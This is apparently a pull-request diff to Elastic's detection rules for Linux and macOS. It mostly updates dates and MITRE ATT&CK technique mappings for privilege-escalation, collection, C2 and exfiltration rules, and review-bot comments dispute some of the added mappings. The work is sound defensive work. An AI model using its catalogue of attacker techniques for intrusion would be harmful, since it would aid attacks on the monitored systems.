@@ -124,14 +124,31 @@ In Linux environments, the `/etc/passwd` file is crucial for managing user accou [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml index a179911f656..2c32e927a08 100644 --- a/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_uid_guid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -141,3 +141,21 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_uid_change_post_compilation.toml b/rules/linux/privilege_escalation_uid_change_post_compilation.toml index 8a74ae8f836..34b21863ace 100644 --- a/rules/linux/privilege_escalation_uid_change_post_compilation.toml +++ b/rules/linux/privilege_escalation_uid_change_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml index 46af7128890..31c8199b6ec 100644 --- a/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml 
+++ b/rules/linux/privilege_escalation_uid_elevation_from_unknown_executable.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,6 +115,16 @@ and process.parent.name:("bash" or "dash" or "sh" or "tcsh" or "csh" or "zsh" or [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -142,7 +152,6 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml index 05c5c6f2abf..98ed00988c7 100644 --- a/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml +++ b/rules/linux/privilege_escalation_unshare_namespace_manipulation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,6 +125,11 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" 
diff --git a/rules/linux/privilege_escalation_writable_docker_socket.toml b/rules/linux/privilege_escalation_writable_docker_socket.toml index 7b9152ef549..a19944f3bd7 100644 --- a/rules/linux/privilege_escalation_writable_docker_socket.toml +++ b/rules/linux/privilege_escalation_writable_docker_socket.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,14 +107,26 @@ Docker sockets facilitate communication between the Docker client and daemon, ty [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1611" name = "Escape to Host" reference = "https://attack.mitre.org/techniques/T1611/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml index 298a32c90fc..040480b43bf 100644 --- a/rules/macos/collection_discovery_output_written_to_suspicious_file.toml +++ b/rules/macos/collection_discovery_output_written_to_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -75,30 +75,40 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" - [[rule.threat.technique]] - name = "Data Staged" - id = "T1074" - reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique.subtechnique]] - name = "Local Data Staging" - id = "T1074.001" - reference = "https://attack.mitre.org/techniques/T1074/001/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" - - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml index 68fa16c9024..27155e6e4f8 100644 
--- a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml +++ b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,30 +80,35 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] - name = "Data Staged" - id = "T1074" - reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" - [[rule.threat.technique.subtechnique]] - name = "Local Data Staging" - id = "T1074.001" - reference = "https://attack.mitre.org/techniques/T1074/001/" +[[rule.threat.technique.subtechnique]] +id = "T1074.001" +name = "Local Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique]] - name = "Archive Collected Data" - id = "T1560" - reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" 
diff --git a/rules/macos/command_and_control_aws_s3_connection_via_script.toml b/rules/macos/command_and_control_aws_s3_connection_via_script.toml index 2128dd0828a..3b50a6efad2 100644 --- a/rules/macos/command_and_control_aws_s3_connection_via_script.toml +++ b/rules/macos/command_and_control_aws_s3_connection_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -78,30 +78,58 @@ FROM logs-endpoint.events.network-* [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" - [[rule.threat.technique.subtechnique]] - name = "Exfiltration to Cloud Storage" - id = "T1567.002" - reference = "https://attack.mitre.org/techniques/T1567/002/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] 
+id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_google_calendar_c2_via_script.toml b/rules/macos/command_and_control_google_calendar_c2_via_script.toml index 9d68b0d613a..38e50b72a18 100644 --- a/rules/macos/command_and_control_google_calendar_c2_via_script.toml +++ b/rules/macos/command_and_control_google_calendar_c2_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,40 +83,50 @@ sequence by process.entity_id with maxspan=20s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + 
+[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_network_connection_to_oast_domain.toml b/rules/macos/command_and_control_network_connection_to_oast_domain.toml index 0da1e9b9455..3b29be346b3 100644 --- a/rules/macos/command_and_control_network_connection_to_oast_domain.toml +++ b/rules/macos/command_and_control_network_connection_to_oast_domain.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -77,25 +77,56 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" 
diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml index 5241029aa80..e3fa344b232 100644 --- a/rules/macos/command_and_control_perl_outbound_network_connection.toml +++ b/rules/macos/command_and_control_perl_outbound_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -74,30 +74,35 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_potential_etherhiding_c2.toml b/rules/macos/command_and_control_potential_etherhiding_c2.toml index d6eb9a913f6..dfa3fa46769 100644 --- a/rules/macos/command_and_control_potential_etherhiding_c2.toml +++ b/rules/macos/command_and_control_potential_etherhiding_c2.toml 
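Review bot: The sub-technique `T1059.006` (Python) is added to a rule that the file name identifies as a Perl outbound-connection detection; ATT&CK has no Perl sub-technique under T1059, so the parent `T1059` alone is the accurate mapping unless the query also matches a Python interpreter. The query is outside this hunk, so I cannot confirm either way; if it is Perl-only, the four-line `[[rule.threat.technique.subtechnique]]` block for `T1059.006` should be dropped rather than attributing a language the rule does not observe.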
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -80,45 +80,55 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + 
+[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml b/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml index d4ff78d4875..ce91f8fa55a 100644 --- a/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml +++ b/rules/macos/command_and_control_script_interpreter_connection_to_non_standard_port.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,35 +83,40 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" - [[rule.threat.technique]] - name = "Non-Standard Port" - id = "T1571" - reference = "https://attack.mitre.org/techniques/T1571/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" - - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
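Review bot: The added `T1059.005` (Visual Basic) sub-technique looks out of place on a macOS script-interpreter rule, since macOS ships no VBScript host and the existing mappings in this entry are Python and JavaScript. The interpreter list in the query is not part of this hunk, so this may be deliberate; if the query does not match a Visual Basic interpreter, the `T1059.005` block should be removed so the mapping reflects what the rule can actually observe.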
diff --git a/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml b/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml index 06b8d5ebbe5..17e43a7bf0f 100644 --- a/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml +++ b/rules/macos/command_and_control_suspicious_curl_from_macos_application.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,12 +86,40 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
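Review bot: The new Defense Evasion entry maps this rule to `T1553.001` (Gatekeeper Bypass), but the visible hunk shows a rule keyed on curl activity from a macOS application and nothing indicating the query observes quarantine-attribute or Gatekeeper-related behaviour; the mapping reads as contextual inference rather than an observed technique. The same addition appears in command_and_control_suspicious_outbound_network_via_unsigned_binary, where an unsigned binary making a connection likewise does not evidence a Gatekeeper bypass. If neither query contains such a condition, consider leaving the `T1553.001` entry out of both rules, since over-broad mappings inflate tactic coverage reporting without adding detection value.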
diff --git a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml index ba69a5cda68..6ad7cd47925 100644 --- a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml +++ b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -80,22 +80,32 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" - - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" - - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml b/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml index fa4d92218ac..8e423be320a 100644 --- a/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml +++ b/rules/macos/command_and_control_suspicious_outbound_network_via_unsigned_binary.toml 
